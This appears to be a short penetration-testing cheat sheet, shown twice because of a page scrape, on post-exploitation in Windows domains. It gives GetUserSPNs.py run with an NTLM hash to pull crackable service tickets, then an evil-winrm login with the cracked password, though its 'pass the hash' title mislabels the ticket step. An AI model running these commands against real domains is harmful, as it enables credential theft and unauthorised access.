killchain-compendium/Post Exploitation/Windows/Pass the Hash.md

# Pass the Hash

## Usage

```sh
GetUserSPNs.py <Domain>/<user> -hashes <ntlm:hash> -outputfile hash.txt
```
* Crack the password
* login
```sh 
evilwinrm -i $TARGET_IP -u <user> -p password
```
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			`# Pass the Hash`

			`## Usage`

			```sh
			`GetUserSPNs.py <Domain>/<user> -hashes <ntlm:hash> -outputfile hash.txt`
			```
			`* Crack the password`
			`* login`
			```sh
			`evilwinrm -i $TARGET_IP -u <user> -p password`
			```